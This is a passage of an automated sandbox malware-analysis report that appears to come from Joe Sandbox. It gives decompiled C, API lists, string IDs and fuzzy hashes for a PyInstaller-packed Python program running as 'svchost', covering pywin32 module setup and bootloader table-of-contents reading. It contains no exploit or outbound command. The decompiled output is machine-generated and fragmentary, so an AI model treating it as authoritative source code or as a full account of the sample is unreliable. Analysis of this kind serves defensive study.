6dab8645-6dab8647 48->52 50 6dab862a-6dab8630 49->50 51 6dab863c-6dab863e 49->51 50->48 53 6dab8632-6dab863a 50->53 51->52 52->25 54 6dab864d-6dab8652 52->54 53->47 53->51 55 6dab8654-6dab8658 54->55 56 6dab865a-6dab865c 55->56 57 6dab8674-6dab8676 55->57 59 6dab865e-6dab8664 56->59 60 6dab8670-6dab8672 56->60 58 6dab8679-6dab867b 57->58 58->25 62 6dab8681-6dab8686 58->62 59->57 61 6dab8666-6dab866e 59->61 60->58 61->55 61->60 63 6dab8688-6dab868c 62->63 64 6dab86a8-6dab86aa 63->64 65 6dab868e-6dab8690 63->65 68 6dab86ad-6dab86af 64->68 66 6dab8692-6dab8698 65->66 67 6dab86a4-6dab86a6 65->67 66->64 69 6dab869a-6dab86a2 66->69 67->68 68->25 70 6dab86b1-6dab86b6 68->70 69->63 69->67 71 6dab86b8-6dab86bc 70->71 72 6dab86d8-6dab86da 71->72 73 6dab86be-6dab86c0 71->73 74 6dab86dd-6dab86df 72->74 75 6dab86c2-6dab86c8 73->75 76 6dab86d4-6dab86d6 73->76 74->25 78 6dab86e1 74->78 75->72 77 6dab86ca-6dab86d2 75->77 76->74 77->71 77->76 79 6dab86e6-6dab86ea 78->79 80 6dab86ec-6dab86ee 79->80 81 6dab8706-6dab8708 79->81 82 6dab8702-6dab8704 80->82 83 6dab86f0-6dab86f6 80->83 84 6dab870b-6dab870d 81->84 82->84 83->81 85 6dab86f8-6dab8700 83->85 84->25 84->31 85->79 85->82
                            APIs
                            • PyModule_Create2.PYTHON38(6DAC7B44,000003F5), ref: 6DAB8467
                            • PyModule_GetDict.PYTHON38(00000000), ref: 6DAB847E
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Module_$Create2Dict
                            • String ID: AlphaBlend$AngleArc$AnimateWindow$AnimateWindow$CLR_NONE$CombineTransform$DrawTextW$DrawTextW$GetLayeredWindowAttributes$GetLayeredWindowAttributes$GetLayout$GetMenuInfo$GetOpenFileNameW$GetSaveFileNameW$GetWorldTransform$GradientFill$ILC_COLOR$ILC_COLOR16$ILC_COLOR24$ILC_COLOR32$ILC_COLOR4$ILC_COLOR8$ILC_COLORDDB$ILC_MASK$ILD_BLEND$ILD_BLEND25$ILD_BLEND50$ILD_FOCUS$ILD_MASK$ILD_NORMAL$ILD_SELECTED$ILD_TRANSPARENT$IMAGE_BITMAP$IMAGE_CURSOR$IMAGE_ICON$LR_CREATEDIBSECTION$LR_DEFAULTCOLOR$LR_DEFAULTSIZE$LR_LOADFROMFILE$LR_LOADMAP3DCOLORS$LR_LOADTRANSPARENT$LR_MONOCHROME$LR_SHARED$LR_VGACOLOR$MaskBlt$ModifyWorldTransform$NIF_ICON$NIF_INFO$NIF_MESSAGE$NIF_STATE$NIF_TIP$NIIF_ERROR$NIIF_ICON_MASK$NIIF_INFO$NIIF_NONE$NIIF_NOSOUND$NIIF_WARNING$NIM_ADD$NIM_DELETE$NIM_MODIFY$NIM_SETVERSION$PlgBlt$SetLayeredWindowAttributes$SetLayeredWindowAttributes$SetLayout$SetMenuInfo$SetWorldTransform$SystemParametersInfo$TPM_BOTTOMALIGN$TPM_CENTERALIGN$TPM_LEFTALIGN$TPM_LEFTBUTTON$TPM_NONOTIFY$TPM_RETURNCMD$TPM_RIGHTALIGN$TPM_RIGHTBUTTON$TPM_TOPALIGN$TPM_VCENTERALIGN$TransparentBlt$UNICODE$UNICODE$UpdateLayeredWindow$UpdateLayeredWindow$dllhandle$error$error$gdi32.dll$gdi32.dll$msimg32.dll$msimg32.dll$user32.dll$user32.dll
                            • API String ID: 1218557240-3017165179
                            • Opcode ID: df7c6a03395ea6349e6638200d8f24198036782a84021098d075e3f1458d6e14
                            • Instruction ID: 8efaceac6c3efa284af96e9068935fc9abe578f1eea1fee1e9604a3aad824a55
                            • Opcode Fuzzy Hash: df7c6a03395ea6349e6638200d8f24198036782a84021098d075e3f1458d6e14
                            • Instruction Fuzzy Hash: DF1217A0E4D30A3EE710277A4C56F3B7E6CEF526A4F084116F94A96283DE36C4C38675
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA7BF40, Relevance: 311.9, APIs: 92, Strings: 86, Instructions: 418COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 27%
                            			E6DA7BF40(void* __eax) {
				void* _t9;
				struct HINSTANCE__* _t93;
				void* _t95;
				struct HINSTANCE__* _t98;
				struct HINSTANCE__* _t99;
				struct HINSTANCE__* _t100;
				struct HINSTANCE__* _t101;
				void* _t104;
				void* _t105;
				void* _t110;
				intOrPtr* _t111;
				intOrPtr* _t113;
				void* _t116;
				intOrPtr* _t117;

				__imp__?PyWinGlobals_Ensure@@YAHXZ();
				if(__eax != 0xffffffff) {
					__imp__PyModule_Create2(0x6da88ff0, 0x3f5, _t104);
					_t105 = __eax;
					if(__eax != 0) {
						__imp__PyModule_GetDict(__eax, _t95);
						if(__eax != 0) {
							_t117 = __imp__PyDict_SetItemString;
							 *_t117(__eax, "error",  *__imp__?PyWinExc_ApiError@@3PAU_object@@A, _t110, _t116);
							_t111 = __imp__PyLong_FromLong;
							 *_t117(__eax, "STD_INPUT_HANDLE",  *_t111(0xfffffff6));
							 *_t117(__eax, "STD_OUTPUT_HANDLE",  *_t111(0xfffffff5));
							_t9 =  *_t117(__eax, "STD_ERROR_HANDLE",  *_t111(0xfffffff4));
							__imp__PyType_Ready(0x6da88000);
							if(_t9 == 0xffffffff) {
								L21:
								return 0;
							} else {
								_push(0x6da88000);
								_push("PyDISPLAY_DEVICEType");
								_push(__eax);
								if( *_t117() == 0xffffffff) {
									goto L21;
								} else {
									_t113 = __imp__PyModule_AddIntConstant;
									 *_t113(__eax, "NameUnknown", 0);
									 *_t113(__eax, "NameFullyQualifiedDN", 1);
									 *_t113(__eax, "NameSamCompatible", 2);
									 *_t113(__eax, "NameDisplay", 3);
									 *_t113(__eax, "NameUniqueId", 6);
									 *_t113(__eax, "NameCanonical", 7);
									 *_t113(__eax, "NameUserPrincipal", 8);
									 *_t113(__eax, "NameCanonicalEx", 9);
									 *_t113(__eax, "NameServicePrincipal", 0xa);
									 *_t113(__eax, "REG_NOTIFY_CHANGE_NAME", 1);
									 *_t113(__eax, "REG_NOTIFY_CHANGE_ATTRIBUTES", 2);
									 *_t113(__eax, "REG_NOTIFY_CHANGE_LAST_SET", 4);
									 *_t113(__eax, "REG_NOTIFY_CHANGE_SECURITY", 8);
									 *_t113(__eax, "VOS_DOS", 0x10000);
									 *_t113(__eax, "VOS_NT", 0x40000);
									 *_t113(__eax, "VOS__WINDOWS16", 1);
									 *_t113(__eax, "VOS__WINDOWS32", 4);
									 *_t113(__eax, "VOS_OS216", 0x20000);
									 *_t113(__eax, "VOS_OS232", 0x30000);
									 *_t113(__eax, "VOS__PM16", 2);
									 *_t113(__eax, "VOS__PM32", 3);
									 *_t113(__eax, "VOS_UNKNOWN", 0);
									 *_t113(__eax, "VOS_DOS_WINDOWS16", 0x10001);
									 *_t113(__eax, "VOS_DOS_WINDOWS32", 0x10004);
									 *_t113(__eax, "VOS_NT_WINDOWS32", 0x40004);
									 *_t113(__eax, "VOS_OS216_PM16", 0x20002);
									 *_t113(__eax, "VOS_OS232_PM32", 0x30003);
									 *_t113(__eax, "VFT_UNKNOWN", 0);
									 *_t113(__eax, "VFT_APP", 1);
									 *_t113(__eax, "VFT_DLL", 2);
									 *_t113(__eax, "VFT_DRV", 3);
									 *_t113(__eax, "VFT_FONT", 4);
									 *_t113(__eax, "VFT_VXD", 5);
									 *_t113(__eax, "VFT_STATIC_LIB", 7);
									 *_t113(__eax, "VS_FF_DEBUG", 1);
									 *_t113(__eax, "VS_FF_INFOINFERRED", 0x10);
									 *_t113(__eax, "VS_FF_PATCHED", 4);
									 *_t113(__eax, "VS_FF_PRERELEASE", 2);
									 *_t113(__eax, "VS_FF_PRIVATEBUILD", 8);
									 *_t113(__eax, "VS_FF_SPECIALBUILD", 0x20);
									_t98 = GetModuleHandleW(L"secur32.dll");
									if(_t98 != 0) {
										L10:
										 *0x6da89120 = GetProcAddress(_t98, "GetUserNameExW");
										 *0x6da89124 = GetProcAddress(_t98, "GetComputerObjectNameW");
									} else {
										_t93 = LoadLibraryW(L"secur32.dll"); // executed
										_t98 = _t93;
										if(_t98 != 0) {
											goto L10;
										}
									}
									_t99 = GetModuleHandleW(L"kernel32.dll");
									if(_t99 != 0) {
										L13:
										 *0x6da890f0 = GetProcAddress(_t99, "GetComputerNameExW");
										 *0x6da890f4 = GetProcAddress(_t99, "GetLongPathNameA");
										 *0x6da890f8 = GetProcAddress(_t99, "GetLongPathNameW");
										 *0x6da890fc = GetProcAddress(_t99, "GetHandleInformation");
										 *0x6da89100 = GetProcAddress(_t99, "SetHandleInformation");
										 *0x6da89104 = GetProcAddress(_t99, "GlobalMemoryStatusEx");
										 *0x6da89108 = GetProcAddress(_t99, "GetSystemFileCacheSize");
										 *0x6da8910c = GetProcAddress(_t99, "SetSystemFileCacheSize");
										 *0x6da89110 = GetProcAddress(_t99, "GetDllDirectoryW");
										 *0x6da89114 = GetProcAddress(_t99, "SetDllDirectoryW");
										 *0x6da89118 = GetProcAddress(_t99, "SetSystemPowerState");
										 *0x6da8911c = GetProcAddress(_t99, "GetNativeSystemInfo");
									} else {
										_t99 = LoadLibraryW(L"kernel32.dll");
										if(_t99 != 0) {
											goto L13;
										}
									}
									_t100 = GetModuleHandleW(L"user32.dll");
									if(_t100 != 0) {
										L16:
										 *0x6da890d0 = GetProcAddress(_t100, "EnumDisplayMonitors");
										 *0x6da890cc = GetProcAddress(_t100, "EnumDisplayDevicesW");
										 *0x6da890c8 = GetProcAddress(_t100, "ChangeDisplaySettingsExW");
										 *0x6da890d4 = GetProcAddress(_t100, "MonitorFromWindow");
										 *0x6da890d8 = GetProcAddress(_t100, "MonitorFromRect");
										 *0x6da890dc = GetProcAddress(_t100, "MonitorFromPoint");
										 *0x6da890e0 = GetProcAddress(_t100, "GetMonitorInfoW");
										 *0x6da890e4 = GetProcAddress(_t100, "EnumDisplaySettingsExW");
										 *0x6da89150 = GetProcAddress(_t100, "GetLastInputInfo");
									} else {
										_t100 = LoadLibraryW(L"user32.dll");
										if(_t100 != 0) {
											goto L16;
										}
									}
									_t101 = GetModuleHandleW(L"Advapi32.dll");
									if(_t101 != 0) {
										L19:
										 *0x6da89128 = GetProcAddress(_t101, "RegRestoreKeyW");
										 *0x6da8912c = GetProcAddress(_t101, "RegSaveKeyExW");
										 *0x6da89130 = GetProcAddress(_t101, "RegCreateKeyTransactedW");
										 *0x6da8913c = GetProcAddress(_t101, "RegOpenKeyTransactedW");
										 *0x6da89134 = GetProcAddress(_t101, "RegDeleteKeyExW");
										 *0x6da89138 = GetProcAddress(_t101, "RegDeleteKeyTransactedW");
										 *0x6da89140 = GetProcAddress(_t101, "RegCopyTreeW");
										 *0x6da89144 = GetProcAddress(_t101, "RegDeleteTreeW");
										 *0x6da89148 = GetProcAddress(_t101, "RegOpenCurrentUser");
										 *0x6da8914c = GetProcAddress(_t101, "RegOverridePredefKey");
									} else {
										_t101 = LoadLibraryW(L"Advapi32.dll");
										if(_t101 != 0) {
											goto L19;
										}
									}
									return _t105;
								}
							}
						} else {
							return __eax;
						}
					} else {
						return __eax;
					}
				} else {
					return 0;
				}
			}

















                            0x6da7bf40
                            0x6da7bf49
                            0x6da7bf59
                            0x6da7bf5f
                            0x6da7bf66
                            0x6da7bf6c
                            0x6da7bf79
                            0x6da7bf84
                            0x6da7bf93
                            0x6da7bf95
                            0x6da7bfa6
                            0x6da7bfb3
                            0x6da7bfc0
                            0x6da7bfc7
                            0x6da7bfd3
                            0x6da7c3f8
                            0x6da7c3fe
                            0x6da7bfd9
                            0x6da7bfd9
                            0x6da7bfde
                            0x6da7bfe3
                            0x6da7bfec
                            0x00000000
                            0x6da7bff2
                            0x6da7bff2
                            0x6da7c000
                            0x6da7c00a
                            0x6da7c014
                            0x6da7c01e
                            0x6da7c028
                            0x6da7c032
                            0x6da7c03f
                            0x6da7c049
                            0x6da7c053
                            0x6da7c05d
                            0x6da7c067
                            0x6da7c071
                            0x6da7c07e
                            0x6da7c08b
                            0x6da7c098
                            0x6da7c0a2
                            0x6da7c0ac
                            0x6da7c0b9
                            0x6da7c0c9
                            0x6da7c0d3
                            0x6da7c0dd
                            0x6da7c0e7
                            0x6da7c0f4
                            0x6da7c101
                            0x6da7c111
                            0x6da7c11e
                            0x6da7c12b
                            0x6da7c135
                            0x6da7c13f
                            0x6da7c149
                            0x6da7c156
                            0x6da7c160
                            0x6da7c16a
                            0x6da7c174
                            0x6da7c17e
                            0x6da7c188
                            0x6da7c195
                            0x6da7c19f
                            0x6da7c1a9
                            0x6da7c1b3
                            0x6da7c1c9
                            0x6da7c1d3
                            0x6da7c1e2
                            0x6da7c1f0
                            0x6da7c1f7
                            0x6da7c1d5
                            0x6da7c1da
                            0x6da7c1dc
                            0x6da7c1e0
                            0x00000000
                            0x00000000
                            0x6da7c1e0
                            0x6da7c207
                            0x6da7c20b
                            0x6da7c21e
                            0x6da7c22c
                            0x6da7c239
                            0x6da7c246
                            0x6da7c253
                            0x6da7c260
                            0x6da7c26d
                            0x6da7c27a
                            0x6da7c287
                            0x6da7c294
                            0x6da7c2a1
                            0x6da7c2ae
                            0x6da7c2b5
                            0x6da7c20d
                            0x6da7c214
                            0x6da7c218
                            0x00000000
                            0x00000000
                            0x6da7c218
                            0x6da7c2c5
                            0x6da7c2c9
                            0x6da7c2d8
                            0x6da7c2e6
                            0x6da7c2f3
                            0x6da7c300
                            0x6da7c30d
                            0x6da7c31a
                            0x6da7c327
                            0x6da7c334
                            0x6da7c341
                            0x6da7c348
                            0x6da7c2cb
                            0x6da7c2d2
                            0x6da7c2d6
                            0x00000000
                            0x00000000
                            0x6da7c2d6
                            0x6da7c358
                            0x6da7c35c
                            0x6da7c36f
                            0x6da7c37d
                            0x6da7c38a
                            0x6da7c397
                            0x6da7c3a4
                            0x6da7c3b1
                            0x6da7c3be
                            0x6da7c3cb
                            0x6da7c3d8
                            0x6da7c3e5
                            0x6da7c3ec
                            0x6da7c35e
                            0x6da7c365
                            0x6da7c369
                            0x00000000
                            0x00000000
                            0x6da7c369
                            0x6da7c3f7
                            0x6da7c3f7
                            0x6da7bfec
                            0x6da7bf7b
                            0x6da7bf7d
                            0x6da7bf7d
                            0x6da7bf68
                            0x6da7bf69
                            0x6da7bf69
                            0x6da7bf4b
                            0x6da7bf4d
                            0x6da7bf4d

                            APIs
                            • PyModule_Create2.PYTHON38(6DA88FF0,000003F5), ref: 6DA7BF59
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481554182.000000006DA71000.00000020.00020000.sdmp, Offset: 6DA70000, based on PE: true
                            • Associated: 00000013.00000002.481543562.000000006DA70000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481580186.000000006DA7F000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481590632.000000006DA88000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481599637.000000006DA8B000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da70000_svchost.jbxd
                            Similarity
                            • API ID: Create2Module_
                            • String ID: Advapi32.dll$Advapi32.dll$ChangeDisplaySettingsExW$EnumDisplayDevicesW$EnumDisplayMonitors$EnumDisplaySettingsExW$GetComputerNameExW$GetComputerObjectNameW$GetDllDirectoryW$GetHandleInformation$GetLastInputInfo$GetLongPathNameA$GetLongPathNameW$GetMonitorInfoW$GetNativeSystemInfo$GetSystemFileCacheSize$GetUserNameExW$GlobalMemoryStatusEx$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$NameCanonical$NameCanonicalEx$NameDisplay$NameFullyQualifiedDN$NameSamCompatible$NameServicePrincipal$NameUniqueId$NameUnknown$NameUserPrincipal$PyDISPLAY_DEVICEType$REG_NOTIFY_CHANGE_ATTRIBUTES$REG_NOTIFY_CHANGE_LAST_SET$REG_NOTIFY_CHANGE_NAME$REG_NOTIFY_CHANGE_SECURITY$RegCopyTreeW$RegCreateKeyTransactedW$RegDeleteKeyExW$RegDeleteKeyTransactedW$RegDeleteTreeW$RegOpenCurrentUser$RegOpenKeyTransactedW$RegOverridePredefKey$RegRestoreKeyW$RegSaveKeyExW$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$SetDllDirectoryW$SetHandleInformation$SetSystemFileCacheSize$SetSystemPowerState$VFT_APP$VFT_DLL$VFT_DRV$VFT_FONT$VFT_STATIC_LIB$VFT_UNKNOWN$VFT_VXD$VOS_DOS$VOS_DOS_WINDOWS16$VOS_DOS_WINDOWS32$VOS_NT$VOS_NT_WINDOWS32$VOS_OS216$VOS_OS216_PM16$VOS_OS232$VOS_OS232_PM32$VOS_UNKNOWN$VOS__PM16$VOS__PM32$VOS__WINDOWS16$VOS__WINDOWS32$VS_FF_DEBUG$VS_FF_INFOINFERRED$VS_FF_PATCHED$VS_FF_PRERELEASE$VS_FF_PRIVATEBUILD$VS_FF_SPECIALBUILD$error$kernel32.dll$kernel32.dll$secur32.dll$secur32.dll$user32.dll$user32.dll
                            • API String ID: 2002799645-2903159764
                            • Opcode ID: 907e85cd600c38220754d69b07d623b298df0be130ac9d4b2c7078961f067245
                            • Instruction ID: e762db895d93616a8e89451ef64a81200cc9329499ed52bc5230d58e58765ff6
                            • Opcode Fuzzy Hash: 907e85cd600c38220754d69b07d623b298df0be130ac9d4b2c7078961f067245
                            • Instruction Fuzzy Hash: 3DB160A4D4C3257EDA316F764DCDF3F2DB8FB46666F00442AFD08A2183DB68408299A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC3230, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 105COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PyUnicode_Decode.PYTHON38(00003068,00003069,utf-8,strict,00000000,00000000,00BC2044,00000000,00000000,00000000,?,?,?,00000000), ref: 00BC3256
                            • PySys_SetObject.PYTHON38(_MEIPASS,00000000,?), ref: 00BC327D
                            • PyImport_ImportModule.PYTHON38(marshal), ref: 00BC3288
                            • PyModule_GetDict.PYTHON38(00000000), ref: 00BC328F
                            • PyDict_GetItemString.PYTHON38(00000000,loads), ref: 00BC329B
                            • htonl.WS2_32(?), ref: 00BC32DC
                            • htonl.WS2_32(?), ref: 00BC32EA
                            • PyObject_CallFunction.PYTHON38(00000000,00BE1604,0000000C,-0000000C,?,?,00000000), ref: 00BC32FD
                            • PyImport_ExecCodeModule.PYTHON38(?,00000000), ref: 00BC330F
                            • PyErr_Occurred.PYTHON38 ref: 00BC332D
                            • PyErr_Print.PYTHON38 ref: 00BC3337
                            • PyErr_Clear.PYTHON38 ref: 00BC333D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Err_$Import_Modulehtonl$CallClearCodeDecodeDictDict_ExecFunctionImportItemModule_ObjectObject_OccurredPrintStringSys_Unicode_
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 3206803411-3336796446
                            • Opcode ID: c1c340891ce5f5ede9b8d9f68c7cc7b6ac5600d4b0e54342d9c3b0f89eca212b
                            • Instruction ID: d2e59c78d3e2a6452f53d8c29e55124e93e8d169c30e3e4b30def1231b14db3f
                            • Opcode Fuzzy Hash: c1c340891ce5f5ede9b8d9f68c7cc7b6ac5600d4b0e54342d9c3b0f89eca212b
                            • Instruction Fuzzy Hash: 183157765002406FCB102B79AC8AE6B7FECEA817117448999F807E7153EF31EA1186A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC2210, Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 131COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PyImport_AddModule.PYTHON38(__main__,00000000,00000000,00BC205E,00000000,?,?,00000000,00000000,?,?,?,00000000), ref: 00BC2239
                            • PyModule_GetDict.PYTHON38(00000000,?,?,?,00000000,00000000,?,?,?,00000000), ref: 00BC2272
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: DictImport_ModuleModule_
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 1159605621-2368408649
                            • Opcode ID: 3182cbd4b9867e6584759273758bfb3b78269ebd6c0b94de9cd4688316363cac
                            • Instruction ID: 629c48bde79b9bf758f21a8e5eaa54c42d9692f4bdd0c63d363066ad1ecc50c6
                            • Opcode Fuzzy Hash: 3182cbd4b9867e6584759273758bfb3b78269ebd6c0b94de9cd4688316363cac
                            • Instruction Fuzzy Hash: 61416EB59042806FD710A739EC86F5B7BD8FF84321F0406A9F809D6193EFB9D58586A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91510, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73threadsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:CreateMutex,?,?,?), ref: 6DA91543
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91561
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA9157B
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9158A
                            • CreateMutexW.KERNEL32(?,?,?), ref: 6DA9159E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA915A7
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA915BA
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA915C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateFreeFromMutexParseRestoreSaveTuple
                            • String ID: CreateMutex$OiO:CreateMutex
                            • API String ID: 3622171656-1372909194
                            • Opcode ID: 0b4157def8d1f9d889cac2f36118d290f7285fc803060f752efd73dd406bbf3d
                            • Instruction ID: f6e7f0781b0fad480780b884b1d98c50c1b4b0bd7c8d19df1961d6e4115610d2
                            • Opcode Fuzzy Hash: 0b4157def8d1f9d889cac2f36118d290f7285fc803060f752efd73dd406bbf3d
                            • Instruction Fuzzy Hash: 0A213479018301AFDB005B58CC08BAF7BF8FF89318F518425F969C51A1EB71C1698B9B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1560, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 95COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E00BC1560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
				void* _t14;
				signed int _t15;
				void* _t18;
				signed int _t19;
				void* _t20;
				signed int _t26;
				signed int _t28;
				void* _t31;
				void* _t32;
				signed int* _t33;
				void* _t35;
				void* _t36;

				_t32 = __edx;
				_t31 = __ecx;
				_t33 = _a4;
				if( *_t33 != 0) {
					L2:
					_t14 = E00BC1120(_t32, _t33);
					_t36 = _t35 + 4;
					_t48 = _t14 - 1;
					if(_t14 < 1) {
						E00BC9F16(_t32,  *_t33, 0, 2); // executed
						_t14 = E00BCA488(_t32, _t48,  *_t33); // executed
						_t36 = _t36 + 0x10;
					}
					_t15 = E00BC13D0(_t32, _t33, _t14);
					if(_t15 == 0xffffffff) {
						goto L7;
					} else {
						_t3 =  &(_t33[9]); // 0x1
						_push( *_t3);
						_t33[0x101b] = 0;
						L00BC7864();
						_push(0);
						 *0xbec954 = _t15;
						_t5 =  &(_t33[7]); // 0xc0335f00
						L00BC7864();
						_t6 =  &(_t33[1]); // 0x1a74c085
						_t18 = E00BC9F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
						_t7 =  &(_t33[8]); // 0xb85fc35b
						_push( *_t7);
						L00BC7864();
						_push(_t18);
						_t19 = E00BC9808(_t31);
						_t33[2] = _t19;
						_t50 = _t19;
						if(_t19 != 0) {
							_push( *_t33);
							_t9 =  &(_t33[8]); // 0xb85fc35b
							L00BC7864();
							_t10 =  &(_t33[2]); // 0xc085078b, executed
							_t20 = E00BC9B2B( *_t10, _t19,  *_t9, 1); // executed
							__eflags = _t20 - 1;
							if(__eflags >= 0) {
								_t11 =  &(_t33[8]); // 0xb85fc35b
								_push( *_t11);
								L00BC7864();
								_t12 =  &(_t33[2]); // 0xc085078b
								_t33[3] = _t20 +  *_t12;
								__eflags = E00BC9934( *_t33);
								if(__eflags == 0) {
									E00BC1200(_t33);
									__eflags = 0;
									return 0;
								} else {
									_push("Error on file\n.");
									_t26 = E00BC1910(__eflags) | 0xffffffff;
									__eflags = _t26;
									return _t26;
								}
							} else {
								_push("Could not read from file.");
								_push("fread");
								_t28 = E00BC17B0(__eflags) | 0xffffffff;
								__eflags = _t28;
								return _t28;
							}
						} else {
							_push("Could not allocate buffer for TOC.");
							_push("malloc");
							_t15 = E00BC17B0(_t50);
							goto L7;
						}
					}
				} else {
					_t2 =  &(_t33[0x1a]); // 0xbc176c
					_t15 = E00BC28C0(_t2, "rb");
					_t35 = _t35 + 8;
					 *_t33 = _t15;
					if(_t15 == 0) {
						L7:
						return _t15 | 0xffffffff;
					} else {
						goto L2;
					}
				}
			}















                            0x00bc1560
                            0x00bc1560
                            0x00bc1561
                            0x00bc1568
                            0x00bc1585
                            0x00bc1586
                            0x00bc158b
                            0x00bc158e
                            0x00bc1591
                            0x00bc1599
                            0x00bc15a0
                            0x00bc15a5
                            0x00bc15a5
                            0x00bc15aa
                            0x00bc15b5
                            0x00000000
                            0x00bc15b7
                            0x00bc15b7
                            0x00bc15b7
                            0x00bc15ba
                            0x00bc15c4
                            0x00bc15c9
                            0x00bc15cb
                            0x00bc15d0
                            0x00bc15d3
                            0x00bc15d8
                            0x00bc15de
                            0x00bc15e6
                            0x00bc15e6
                            0x00bc15e9
                            0x00bc15ee
                            0x00bc15ef
                            0x00bc15f7
                            0x00bc15fa
                            0x00bc15fc
                            0x00bc1615
                            0x00bc1619
                            0x00bc161c
                            0x00bc1622
                            0x00bc1625
                            0x00bc162d
                            0x00bc1630
                            0x00bc1649
                            0x00bc1649
                            0x00bc164c
                            0x00bc1651
                            0x00bc1656
                            0x00bc1661
                            0x00bc1663
                            0x00bc1678
                            0x00bc1680
                            0x00bc1683
                            0x00bc1665
                            0x00bc1665
                            0x00bc1672
                            0x00bc1672
                            0x00bc1676
                            0x00bc1676
                            0x00bc1632
                            0x00bc1632
                            0x00bc1637
                            0x00bc1644
                            0x00bc1644
                            0x00bc1648
                            0x00bc1648
                            0x00bc15fe
                            0x00bc15fe
                            0x00bc1603
                            0x00bc1608
                            0x00000000
                            0x00bc160d
                            0x00bc15fc
                            0x00bc156a
                            0x00bc156a
